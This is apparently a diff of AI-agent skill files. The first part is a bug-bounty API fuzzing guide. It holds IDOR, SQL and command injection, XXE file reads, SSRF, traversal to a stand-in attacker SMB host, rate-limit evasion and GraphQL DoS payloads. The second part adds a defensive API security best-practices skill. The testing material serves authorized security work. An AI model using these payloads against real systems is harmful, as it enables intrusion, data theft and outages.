GET /api/users/1234 → GET /api/users/1235

# Even if the ID is email-based, try a numeric one
/?user_id=111 instead of /?user_id=user@mail.com

# Test /me/orders vs /user/654321/orders
```

**IDOR Bypass Techniques:**

```bash
# Wrap ID in array
{"id":111} → {"id":[111]}

# JSON wrap
{"id":111} → {"id":{"id":111}}

# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>

# Wildcard injection
{"user_id":"*"}

# Parameter pollution
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
```
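
The basic ID-swapping test lends itself to a small loop. The sketch below is hypothetical: the endpoint template and the `fetch` callable (anything that takes a URL and returns an HTTP status code) stand in for whatever HTTP client and session handling you actually use:

```python
def probe_idor(template: str, ids: range, fetch) -> list[str]:
    """Flag object IDs that return 200 OK; fetch(url) -> HTTP status code."""
    hits = []
    for object_id in ids:
        url = template.format(id=object_id)
        if fetch(url) == 200:  # accessible with our session -> IDOR candidate
            hits.append(url)
    return hits

# Stubbed fetch: pretend only ID 1235 is accessible to our session
fake_fetch = lambda url: 200 if url.endswith("/1235") else 403
print(probe_idor("/api/users/{id}", range(1234, 1237), fake_fetch))
# ['/api/users/1235']
```

In a real engagement, replace the stub with an authenticated client and manually verify each hit before reporting.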

### Step 4: Injection Testing

**SQL Injection in JSON:**

```json
{"id":"56456"} → OK
{"id":"56456 AND 1=1#"} → OK
{"id":"56456 AND 1=2#"} → OK
{"id":"56456 AND 1=3#"} → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
```
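
The differential logic behind this table (a true condition behaves like the baseline, a false condition does not) can be sketched in Python. This is an illustration of the classic boolean-based form (`1=1` vs `1=2`), with `send` as a placeholder for your HTTP client returning the response body:

```python
def looks_boolean_injectable(base_id: str, send) -> bool:
    """send(payload) -> response body; compare TRUE vs FALSE conditions."""
    baseline = send(base_id)
    true_resp = send(f"{base_id} AND 1=1#")
    false_resp = send(f"{base_id} AND 1=2#")
    # Injectable if the TRUE condition matches the baseline
    # while the FALSE condition diverges from it
    return true_resp == baseline and false_resp != baseline

vulnerable = lambda p: "ok" if ("1=2" not in p) else "error"
print(looks_boolean_injectable("56456", vulnerable))  # True
```

Time-based payloads (`sleep(15)`) confirm the finding when response bodies are identical either way.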

**Command Injection:**

```bash
# Ruby on Rails
?url=Kernel#open → ?url=|ls

# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/
```

**XXE Injection:**

```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```

**SSRF via API:**

```html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
```

**.NET Path.Combine Vulnerability:**

```bash
# If a .NET app uses Path.Combine(path_1, path_2),
# test for path traversal:
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
```
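
The reason `Path.Combine` is dangerous is that it silently discards everything before a rooted second argument, so an attacker-controlled filename escapes the intended base directory entirely. Python's `posixpath.join` has the same documented behavior, which makes for a quick demonstration of the trap:

```python
import posixpath

# A rooted second argument replaces the base path entirely --
# the same behavior that makes .NET's Path.Combine exploitable.
print(posixpath.join("/var/www/uploads", "a.png"))        # /var/www/uploads/a.png
print(posixpath.join("/var/www/uploads", "/etc/passwd"))  # /etc/passwd
```

Any download endpoint that joins a base directory with a user-supplied filename this way is worth probing with absolute and UNC-style paths.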

### Step 5: Method Testing

```bash
# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1

# Switch content type
Content-Type: application/json → application/xml
```

---

## GraphQL-Specific Testing

### Introspection Query

Fetch the entire backend schema:

```graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
```

**URL-encoded version:**

```
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
```

### GraphQL IDOR

```graphql
# Try accessing other user IDs
query {
  user(id: "OTHER_USER_ID") {
    email
    password
    creditCard
  }
}
```

### GraphQL SQL/NoSQL Injection

```graphql
mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}
```

### Rate Limit Bypass (Batching)

```graphql
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
```
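
Batched documents like the one above are easy to generate programmatically. A minimal sketch (the mutation shape simply mirrors the hypothetical login example):

```python
def build_login_batch(emails, password):
    """Pack one login mutation per email into a single GraphQL document."""
    tpl = 'mutation {{login(input:{{email:"{e}" password:"{p}"}}){{success jwt}}}}'
    return "\n".join(tpl.format(e=e, p=password) for e in emails)

doc = build_login_batch(["a@example.com", "b@example.com"], "password")
print(doc)
```

Sending the whole document as one request means a per-request rate limiter counts it once, while the server evaluates every mutation inside it.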

### GraphQL DoS (Nested Queries)

```graphql
query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}
```
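
To test how deep a server will evaluate before its query-depth limit (if any) kicks in, it helps to generate these circular queries at arbitrary depth rather than writing them by hand. A sketch using the hypothetical `posts`/`comments`/`user` cycle from the example above:

```python
def nested_query(depth: int) -> str:
    """Build a posts->comments->user query nested `depth` fields deep."""
    fields = ["posts", "comments", "user"]
    body = "id"
    # Wrap from the inside out so index 0 ("posts") ends up outermost
    for level in reversed(range(depth)):
        body = f"{fields[level % 3]} {{ {body} }}"
    return f"query {{ {body} }}"

print(nested_query(4))
# query { posts { comments { user { posts { id } } } } }
```

Ramp the depth up gradually and watch response times; a server without depth limiting degrades quickly.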

### GraphQL XSS

```bash
# XSS via GraphQL endpoint
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

# URL-encoded XSS
http://target.com/example?id=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E
```

### GraphQL Tools

| Tool | Purpose |
|------|---------|
| GraphCrawler | Schema discovery |
| graphw00f | Fingerprinting |
| clairvoyance | Schema reconstruction |
| InQL | Burp extension |
| GraphQLmap | Exploitation |

---

## Endpoint Bypass Techniques

When a request returns 403/401, try these bypasses:

```bash
# Original blocked request
/api/v1/users/sensitivedata → 403

# Bypass attempts
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
```
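
Rather than typing each permutation by hand, the list above can be generated for any blocked path. A small sketch:

```python
def bypass_variants(path: str) -> list[str]:
    """Generate common 403/401 bypass permutations for a blocked path."""
    suffixes = [".json", "?", "/", "??", "%20", "%09", "#", "&details"]
    variants = [path + s for s in suffixes]
    # Path-parsing confusion: inject ..; before the final segment
    head, _, tail = path.rpartition("/")
    variants.append(f"{head}/..;/{tail}")
    return variants

for v in bypass_variants("/api/v1/users/sensitivedata"):
    print(v)
```

Pipe the output into your proxy's intruder/repeater and diff the status codes against the original 403.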

---

## Output Exploitation

### PDF Export Attacks

```html
<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>

<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>

<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>
```

### DoS via Limits

```bash
# Normal request
/api/news?limit=100

# DoS attempt
/api/news?limit=9999999999
```

---

## Common API Vulnerabilities Checklist

| Vulnerability | Description |
|---------------|-------------|
| API Exposure | Unprotected endpoints exposed publicly |
| Misconfigured Caching | Sensitive data cached incorrectly |
| Exposed Tokens | API keys/tokens in responses or URLs |
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
| IDOR / BOLA | Broken Object Level Authorization |
| Undocumented Endpoints | Hidden admin/debug endpoints |
| Different Versions | Security gaps in older API versions |
| Rate Limiting | Missing or bypassable rate limits |
| Race Conditions | TOCTOU vulnerabilities |
| XXE Injection | XML parser exploitation |
| Content Type Issues | Switching between JSON/XML |
| HTTP Method Tampering | GET→DELETE/PUT abuse |

---

## Quick Reference

| Vulnerability | Test Payload | Risk |
|---------------|--------------|------|
| IDOR | Change user_id parameter | High |
| SQLi | `' OR 1=1--` in JSON | Critical |
| Command Injection | `; ls /` | Critical |
| XXE | DOCTYPE with ENTITY | High |
| SSRF | Internal IP in params | High |
| Rate Limit Bypass | Batch requests | Medium |
| Method Tampering | GET→DELETE | High |

---

## Tools Reference

| Category | Tool | URL |
|----------|------|-----|
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
| API Security | apicheck | github.com/BBVA/apicheck |
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
| API Toolkit | APIKit | github.com/API-Security/APIKit |
| API Keys | API Guesser | api-guesser.netlify.app |
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
| GraphQL | InQL | github.com/doyensec/inql |
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
| GraphQL | batchql | github.com/assetnote/batchql |
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |

---

## Constraints

**Must:**
- Test mobile, web, and developer APIs separately
- Check all API versions (/v1, /v2, /v3)
- Validate both authenticated and unauthenticated access

**Must Not:**
- Assume the same security controls across API versions
- Skip testing undocumented endpoints
- Ignore rate limiting checks

**Should:**
- Add the `X-Requested-With: XMLHttpRequest` header to simulate frontend requests
- Check archive.org for historical API endpoints
- Test for race conditions on sensitive operations

---

## Examples

### Example 1: IDOR Exploitation

```bash
# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>

# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>

# The response reveals the other user's invoice data
```

### Example 2: GraphQL Introspection

```bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
```

---

## Troubleshooting

| Issue | Solution |
|-------|----------|
| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
| 401 on all endpoints | Try adding a `?user_id=1` parameter |
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
| Rate limited | Use IP rotation or batch requests |
| Can't find endpoints | Check Swagger, archive.org, JS files |

## When to Use

Use this skill when fuzzing REST, SOAP, or GraphQL APIs during bug bounty hunting or penetration testing engagements, following the workflow described above.
910
packages/llm/skills/api-security-best-practices/SKILL.md
Normal file
@ -0,0 +1,910 @@
---
name: api-security-best-practices
description: "Implement secure API design patterns including authentication, authorization, input validation, rate limiting, and protection against common API vulnerabilities"
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Security Best Practices

## Overview

Guide developers in building secure APIs by implementing authentication, authorization, input validation, rate limiting, and protection against common vulnerabilities. This skill covers security patterns for REST, GraphQL, and WebSocket APIs.

## When to Use This Skill

- Use when designing new API endpoints
- Use when securing existing APIs
- Use when implementing authentication and authorization
- Use when protecting against API attacks (injection, DDoS, etc.)
- Use when conducting API security reviews
- Use when preparing for security audits
- Use when implementing rate limiting and throttling
- Use when handling sensitive data in APIs

## How It Works

### Step 1: Authentication & Authorization

I'll help you implement secure authentication:
- Choose an authentication method (JWT, OAuth 2.0, API keys)
- Implement token-based authentication
- Set up role-based access control (RBAC)
- Secure session management
- Implement multi-factor authentication (MFA)

### Step 2: Input Validation & Sanitization

Protect against injection attacks:
- Validate all input data
- Sanitize user inputs
- Use parameterized queries
- Implement request schema validation
- Prevent SQL injection, XSS, and command injection

### Step 3: Rate Limiting & Throttling

Prevent abuse and DDoS attacks:
- Implement rate limiting per user/IP
- Set up API throttling
- Configure request quotas
- Handle rate limit errors gracefully
- Monitor for suspicious activity

### Step 4: Data Protection

Secure sensitive data:
- Encrypt data in transit (HTTPS/TLS)
- Encrypt sensitive data at rest
- Implement proper error handling (no data leaks)
- Sanitize error messages
- Use secure headers

### Step 5: API Security Testing

Verify the security implementation:
- Test authentication and authorization
- Perform penetration testing
- Check for common vulnerabilities (OWASP API Top 10)
- Validate input handling
- Test rate limiting

## Examples

### Example 1: Implementing JWT Authentication

```markdown
## Secure JWT Authentication Implementation

### Authentication Flow

1. User logs in with credentials
2. Server validates credentials
3. Server generates JWT token
4. Client stores token securely
5. Client sends token with each request
6. Server validates token

### Implementation

#### 1. Generate Secure JWT Tokens

\`\`\`javascript
// auth.js
const jwt = require('jsonwebtoken');
const bcrypt = require('bcrypt');

// Login endpoint
app.post('/api/auth/login', async (req, res) => {
  try {
    const { email, password } = req.body;

    // Validate input
    if (!email || !password) {
      return res.status(400).json({
        error: 'Email and password are required'
      });
    }

    // Find user
    const user = await db.user.findUnique({
      where: { email }
    });

    if (!user) {
      // Don't reveal if user exists
      return res.status(401).json({
        error: 'Invalid credentials'
      });
    }

    // Verify password
    const validPassword = await bcrypt.compare(
      password,
      user.passwordHash
    );

    if (!validPassword) {
      return res.status(401).json({
        error: 'Invalid credentials'
      });
    }

    // Generate JWT token
    const token = jwt.sign(
      {
        userId: user.id,
        email: user.email,
        role: user.role
      },
      process.env.JWT_SECRET,
      {
        expiresIn: '1h',
        issuer: 'your-app',
        audience: 'your-app-users'
      }
    );

    // Generate refresh token
    const refreshToken = jwt.sign(
      { userId: user.id },
      process.env.JWT_REFRESH_SECRET,
      { expiresIn: '7d' }
    );

    // Store refresh token in database
    await db.refreshToken.create({
      data: {
        token: refreshToken,
        userId: user.id,
        expiresAt: new Date(Date.now() + 7 * 24 * 60 * 60 * 1000)
      }
    });

    res.json({
      token,
      refreshToken,
      expiresIn: 3600
    });

  } catch (error) {
    console.error('Login error:', error);
    res.status(500).json({
      error: 'An error occurred during login'
    });
  }
});
\`\`\`

#### 2. Verify JWT Tokens (Middleware)

\`\`\`javascript
// middleware/auth.js
const jwt = require('jsonwebtoken');

function authenticateToken(req, res, next) {
  // Get token from header
  const authHeader = req.headers['authorization'];
  const token = authHeader && authHeader.split(' ')[1]; // Bearer TOKEN

  if (!token) {
    return res.status(401).json({
      error: 'Access token required'
    });
  }

  // Verify token
  jwt.verify(
    token,
    process.env.JWT_SECRET,
    {
      issuer: 'your-app',
      audience: 'your-app-users'
    },
    (err, user) => {
      if (err) {
        if (err.name === 'TokenExpiredError') {
          return res.status(401).json({
            error: 'Token expired'
          });
        }
        return res.status(403).json({
          error: 'Invalid token'
        });
      }

      // Attach user to request
      req.user = user;
      next();
    }
  );
}

module.exports = { authenticateToken };
\`\`\`

#### 3. Protect Routes

\`\`\`javascript
const { authenticateToken } = require('./middleware/auth');

// Protected route
app.get('/api/user/profile', authenticateToken, async (req, res) => {
  try {
    const user = await db.user.findUnique({
      where: { id: req.user.userId },
      select: {
        id: true,
        email: true,
        name: true,
        // Don't return passwordHash
      }
    });

    res.json(user);
  } catch (error) {
    res.status(500).json({ error: 'Server error' });
  }
});
\`\`\`

#### 4. Implement Token Refresh

\`\`\`javascript
app.post('/api/auth/refresh', async (req, res) => {
  const { refreshToken } = req.body;

  if (!refreshToken) {
    return res.status(401).json({
      error: 'Refresh token required'
    });
  }

  try {
    // Verify refresh token
    const decoded = jwt.verify(
      refreshToken,
      process.env.JWT_REFRESH_SECRET
    );

    // Check if refresh token exists in database
    const storedToken = await db.refreshToken.findFirst({
      where: {
        token: refreshToken,
        userId: decoded.userId,
        expiresAt: { gt: new Date() }
      }
    });

    if (!storedToken) {
      return res.status(403).json({
        error: 'Invalid refresh token'
      });
    }

    // Generate new access token
    const user = await db.user.findUnique({
      where: { id: decoded.userId }
    });

    const newToken = jwt.sign(
      {
        userId: user.id,
        email: user.email,
        role: user.role
      },
      process.env.JWT_SECRET,
      { expiresIn: '1h' }
    );

    res.json({
      token: newToken,
      expiresIn: 3600
    });

  } catch (error) {
    res.status(403).json({
      error: 'Invalid refresh token'
    });
  }
});
\`\`\`

### Security Best Practices

- ✅ Use strong JWT secrets (256-bit minimum)
- ✅ Set short expiration times (1 hour for access tokens)
- ✅ Implement refresh tokens for long-lived sessions
- ✅ Store refresh tokens in database (can be revoked)
- ✅ Use HTTPS only
- ✅ Don't store sensitive data in JWT payload
- ✅ Validate token issuer and audience
- ✅ Implement token blacklisting for logout
```

### Example 2: Input Validation and SQL Injection Prevention

```markdown
## Preventing SQL Injection and Input Validation

### The Problem

**❌ Vulnerable Code:**
\`\`\`javascript
// NEVER DO THIS - SQL Injection vulnerability
app.get('/api/users/:id', async (req, res) => {
  const userId = req.params.id;

  // Dangerous: User input directly in query
  const query = \`SELECT * FROM users WHERE id = '\${userId}'\`;
  const user = await db.query(query);

  res.json(user);
});

// Attack example:
// GET /api/users/1' OR '1'='1
// Returns all users!
\`\`\`

### The Solution

#### 1. Use Parameterized Queries

\`\`\`javascript
// ✅ Safe: Parameterized query
app.get('/api/users/:id', async (req, res) => {
  const userId = req.params.id;

  // Validate input first
  if (!userId || !/^\d+$/.test(userId)) {
    return res.status(400).json({
      error: 'Invalid user ID'
    });
  }

  // Use parameterized query
  const user = await db.query(
    'SELECT id, email, name FROM users WHERE id = $1',
    [userId]
  );

  if (!user) {
    return res.status(404).json({
      error: 'User not found'
    });
  }

  res.json(user);
});
\`\`\`

#### 2. Use an ORM with Proper Escaping

\`\`\`javascript
// ✅ Safe: Using Prisma ORM
app.get('/api/users/:id', async (req, res) => {
  const userId = parseInt(req.params.id);

  if (isNaN(userId)) {
    return res.status(400).json({
      error: 'Invalid user ID'
    });
  }

  const user = await prisma.user.findUnique({
    where: { id: userId },
    select: {
      id: true,
      email: true,
      name: true,
      // Don't select sensitive fields
    }
  });

  if (!user) {
    return res.status(404).json({
      error: 'User not found'
    });
  }

  res.json(user);
});
\`\`\`

#### 3. Implement Request Validation with Zod

\`\`\`javascript
const { z } = require('zod');

// Define validation schema
const createUserSchema = z.object({
  email: z.string().email('Invalid email format'),
  password: z.string()
    .min(8, 'Password must be at least 8 characters')
    .regex(/[A-Z]/, 'Password must contain uppercase letter')
    .regex(/[a-z]/, 'Password must contain lowercase letter')
    .regex(/[0-9]/, 'Password must contain number'),
  name: z.string()
    .min(2, 'Name must be at least 2 characters')
    .max(100, 'Name too long'),
  age: z.number()
    .int('Age must be an integer')
    .min(18, 'Must be 18 or older')
    .max(120, 'Invalid age')
    .optional()
});

// Validation middleware
function validateRequest(schema) {
  return (req, res, next) => {
    try {
      schema.parse(req.body);
      next();
    } catch (error) {
      res.status(400).json({
        error: 'Validation failed',
        details: error.errors
      });
    }
  };
}

// Use validation
app.post('/api/users',
  validateRequest(createUserSchema),
  async (req, res) => {
    // Input is validated at this point
    const { email, password, name, age } = req.body;

    // Hash password
    const passwordHash = await bcrypt.hash(password, 10);

    // Create user
    const user = await prisma.user.create({
      data: {
        email,
        passwordHash,
        name,
        age
      }
    });

    // Don't return password hash
    const { passwordHash: _, ...userWithoutPassword } = user;
    res.status(201).json(userWithoutPassword);
  }
);
\`\`\`

#### 4. Sanitize Output to Prevent XSS

\`\`\`javascript
const DOMPurify = require('isomorphic-dompurify');

app.post('/api/comments', authenticateToken, async (req, res) => {
  const { content } = req.body;

  // Validate
  if (!content || content.length > 1000) {
    return res.status(400).json({
      error: 'Invalid comment content'
    });
  }

  // Sanitize HTML to prevent XSS
  const sanitizedContent = DOMPurify.sanitize(content, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
    ALLOWED_ATTR: ['href']
  });

  const comment = await prisma.comment.create({
    data: {
      content: sanitizedContent,
      userId: req.user.userId
    }
  });

  res.status(201).json(comment);
});
\`\`\`

### Validation Checklist

- [ ] Validate all user inputs
- [ ] Use parameterized queries or ORM
- [ ] Validate data types (string, number, email, etc.)
- [ ] Validate data ranges (min/max length, value ranges)
- [ ] Sanitize HTML content
- [ ] Escape special characters
- [ ] Validate file uploads (type, size, content)
- [ ] Use allowlists, not blocklists
```

### Example 3: Rate Limiting and DDoS Protection

```markdown
## Implementing Rate Limiting

### Why Rate Limiting?

- Prevent brute force attacks
- Protect against DDoS
- Prevent API abuse
- Ensure fair usage
- Reduce server costs

### Implementation with Express Rate Limit

\`\`\`javascript
const rateLimit = require('express-rate-limit');
const RedisStore = require('rate-limit-redis');
const Redis = require('ioredis');

// Create Redis client
const redis = new Redis({
  host: process.env.REDIS_HOST,
  port: process.env.REDIS_PORT
});

// General API rate limit
const apiLimiter = rateLimit({
  store: new RedisStore({
    client: redis,
    prefix: 'rl:api:'
  }),
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100, // 100 requests per window
  message: {
    error: 'Too many requests, please try again later',
    retryAfter: 900 // seconds
  },
  standardHeaders: true, // Return rate limit info in headers
  legacyHeaders: false,
  // Custom key generator (by user ID or IP)
  keyGenerator: (req) => {
    return req.user?.userId || req.ip;
  }
});

// Strict rate limit for authentication endpoints
const authLimiter = rateLimit({
  store: new RedisStore({
    client: redis,
    prefix: 'rl:auth:'
  }),
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 5, // Only 5 login attempts per 15 minutes
  skipSuccessfulRequests: true, // Don't count successful logins
  message: {
    error: 'Too many login attempts, please try again later',
    retryAfter: 900
  }
});

// Apply rate limiters
app.use('/api/', apiLimiter);
app.use('/api/auth/login', authLimiter);
app.use('/api/auth/register', authLimiter);

// Custom rate limiter for expensive operations
const expensiveLimiter = rateLimit({
  windowMs: 60 * 60 * 1000, // 1 hour
  max: 10, // 10 requests per hour
  message: {
    error: 'Rate limit exceeded for this operation'
  }
});

app.post('/api/reports/generate',
  authenticateToken,
  expensiveLimiter,
  async (req, res) => {
    // Expensive operation
  }
);
\`\`\`

### Advanced: Per-User Rate Limiting

\`\`\`javascript
// Different limits based on user tier
function createTieredRateLimiter() {
  const limits = {
    free: { windowMs: 60 * 60 * 1000, max: 100 },
    pro: { windowMs: 60 * 60 * 1000, max: 1000 },
    enterprise: { windowMs: 60 * 60 * 1000, max: 10000 }
  };

  return async (req, res, next) => {
    const user = req.user;
    const tier = user?.tier || 'free';
    const limit = limits[tier];

    const key = \`rl:user:\${user.userId}\`;
    const current = await redis.incr(key);

    if (current === 1) {
      await redis.expire(key, limit.windowMs / 1000);
    }

    if (current > limit.max) {
      return res.status(429).json({
        error: 'Rate limit exceeded',
        limit: limit.max,
        remaining: 0,
        reset: await redis.ttl(key)
      });
    }

    // Set rate limit headers
    res.set({
      'X-RateLimit-Limit': limit.max,
      'X-RateLimit-Remaining': limit.max - current,
      'X-RateLimit-Reset': await redis.ttl(key)
    });

    next();
  };
}

app.use('/api/', authenticateToken, createTieredRateLimiter());
\`\`\`

### DDoS Protection with Helmet

\`\`\`javascript
const helmet = require('helmet');

app.use(helmet({
  // Content Security Policy
  contentSecurityPolicy: {
    directives: {
      defaultSrc: ["'self'"],
      styleSrc: ["'self'", "'unsafe-inline'"],
      scriptSrc: ["'self'"],
      imgSrc: ["'self'", 'data:', 'https:']
    }
  },
  // Prevent clickjacking
  frameguard: { action: 'deny' },
  // Hide X-Powered-By header
  hidePoweredBy: true,
  // Prevent MIME type sniffing
  noSniff: true,
  // Enable HSTS
  hsts: {
    maxAge: 31536000,
    includeSubDomains: true,
    preload: true
  }
}));
\`\`\`

### Rate Limit Response Headers

\`\`\`
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 87
X-RateLimit-Reset: 1640000000
Retry-After: 900
\`\`\`
```

## Best Practices

### ✅ Do This

- **Use HTTPS Everywhere** - Never send sensitive data over HTTP
- **Implement Authentication** - Require authentication for protected endpoints
- **Validate All Inputs** - Never trust user input
- **Use Parameterized Queries** - Prevent SQL injection
- **Implement Rate Limiting** - Protect against brute force and DDoS
- **Hash Passwords** - Use bcrypt with salt rounds >= 10
- **Use Short-Lived Tokens** - JWT access tokens should expire quickly
- **Implement CORS Properly** - Only allow trusted origins
- **Log Security Events** - Monitor for suspicious activity
- **Keep Dependencies Updated** - Regularly update packages
- **Use Security Headers** - Implement Helmet.js
- **Sanitize Error Messages** - Don't leak sensitive information

### ❌ Don't Do This

- **Don't Store Passwords in Plain Text** - Always hash passwords
- **Don't Use Weak Secrets** - Use strong, random JWT secrets
- **Don't Trust User Input** - Always validate and sanitize
- **Don't Expose Stack Traces** - Hide error details in production
- **Don't Use String Concatenation for SQL** - Use parameterized queries
- **Don't Store Sensitive Data in JWT** - JWTs are not encrypted
- **Don't Ignore Security Updates** - Update dependencies regularly
- **Don't Use Default Credentials** - Change all default passwords
- **Don't Disable CORS Completely** - Configure it properly instead
- **Don't Log Sensitive Data** - Sanitize logs

## Common Pitfalls
|
||||
|
||||
### Problem: JWT Secret Exposed in Code

**Symptoms:** JWT secret hardcoded or committed to Git

**Solution:**
```javascript
// ❌ Bad
const JWT_SECRET = 'my-secret-key';

// ✅ Good
const JWT_SECRET = process.env.JWT_SECRET;
if (!JWT_SECRET) {
  throw new Error('JWT_SECRET environment variable is required');
}

// Generate strong secret
// node -e "console.log(require('crypto').randomBytes(64).toString('hex'))"
```

### Problem: Weak Password Requirements

**Symptoms:** Users can set weak passwords like "password123"

**Solution:**
```javascript
const passwordSchema = z.string()
  .min(12, 'Password must be at least 12 characters')
  .regex(/[A-Z]/, 'Must contain uppercase letter')
  .regex(/[a-z]/, 'Must contain lowercase letter')
  .regex(/[0-9]/, 'Must contain number')
  .regex(/[^A-Za-z0-9]/, 'Must contain special character');

// Or use a password strength library
const zxcvbn = require('zxcvbn');
const result = zxcvbn(password);
if (result.score < 3) {
  return res.status(400).json({
    error: 'Password too weak',
    suggestions: result.feedback.suggestions
  });
}
```

### Problem: Missing Authorization Checks

**Symptoms:** Users can access resources they shouldn't

**Solution:**
```javascript
// ❌ Bad: Only checks authentication
app.delete('/api/posts/:id', authenticateToken, async (req, res) => {
  await prisma.post.delete({ where: { id: req.params.id } });
  res.json({ success: true });
});

// ✅ Good: Checks both authentication and authorization
app.delete('/api/posts/:id', authenticateToken, async (req, res) => {
  const post = await prisma.post.findUnique({
    where: { id: req.params.id }
  });

  if (!post) {
    return res.status(404).json({ error: 'Post not found' });
  }

  // Check if user owns the post or is admin
  if (post.userId !== req.user.userId && req.user.role !== 'admin') {
    return res.status(403).json({
      error: 'Not authorized to delete this post'
    });
  }

  await prisma.post.delete({ where: { id: req.params.id } });
  res.json({ success: true });
});
```

### Problem: Verbose Error Messages

**Symptoms:** Error messages reveal system details

**Solution:**
```javascript
// ❌ Bad: Exposes database details
app.post('/api/users', async (req, res) => {
  try {
    const user = await prisma.user.create({ data: req.body });
    res.json(user);
  } catch (error) {
    res.status(500).json({ error: error.message });
    // Error: "Unique constraint failed on the fields: (`email`)"
  }
});

// ✅ Good: Generic error message
app.post('/api/users', async (req, res) => {
  try {
    const user = await prisma.user.create({ data: req.body });
    res.json(user);
  } catch (error) {
    console.error('User creation error:', error); // Log full error

    if (error.code === 'P2002') {
      return res.status(400).json({
        error: 'Email already exists'
      });
    }

    res.status(500).json({
      error: 'An error occurred while creating user'
    });
  }
});
```

## Security Checklist

### Authentication & Authorization
- [ ] Implement strong authentication (JWT, OAuth 2.0)
- [ ] Use HTTPS for all endpoints
- [ ] Hash passwords with bcrypt (salt rounds >= 10)
- [ ] Implement token expiration
- [ ] Add refresh token mechanism
- [ ] Verify user authorization for each request
- [ ] Implement role-based access control (RBAC)

### Input Validation
- [ ] Validate all user inputs
- [ ] Use parameterized queries or ORM
- [ ] Sanitize HTML content
- [ ] Validate file uploads
- [ ] Implement request schema validation
- [ ] Use allowlists, not blocklists

### Rate Limiting & DDoS Protection
- [ ] Implement rate limiting per user/IP
- [ ] Add stricter limits for auth endpoints
- [ ] Use Redis for distributed rate limiting
- [ ] Return proper rate limit headers
- [ ] Implement request throttling

### Data Protection
- [ ] Use HTTPS/TLS for all traffic
- [ ] Encrypt sensitive data at rest
- [ ] Don't store sensitive data in JWT
- [ ] Sanitize error messages
- [ ] Implement proper CORS configuration
- [ ] Use security headers (Helmet.js)

### Monitoring & Logging
- [ ] Log security events
- [ ] Monitor for suspicious activity
- [ ] Set up alerts for failed auth attempts
- [ ] Track API usage patterns
- [ ] Don't log sensitive data

## OWASP API Security Top 10

1. **Broken Object Level Authorization** - Always verify user can access resource
2. **Broken Authentication** - Implement strong authentication mechanisms
3. **Broken Object Property Level Authorization** - Validate which properties user can access
4. **Unrestricted Resource Consumption** - Implement rate limiting and quotas
5. **Broken Function Level Authorization** - Verify user role for each function
6. **Unrestricted Access to Sensitive Business Flows** - Protect critical workflows
7. **Server Side Request Forgery (SSRF)** - Validate and sanitize URLs
8. **Security Misconfiguration** - Use security best practices and headers
9. **Improper Inventory Management** - Document and secure all API endpoints
10. **Unsafe Consumption of APIs** - Validate data from third-party APIs

## Related Skills

- `@ethical-hacking-methodology` - Security testing perspective
- `@sql-injection-testing` - Testing for SQL injection
- `@xss-html-injection` - Testing for XSS vulnerabilities
- `@broken-authentication` - Authentication vulnerabilities
- `@backend-dev-guidelines` - Backend development standards
- `@systematic-debugging` - Debug security issues

## Additional Resources

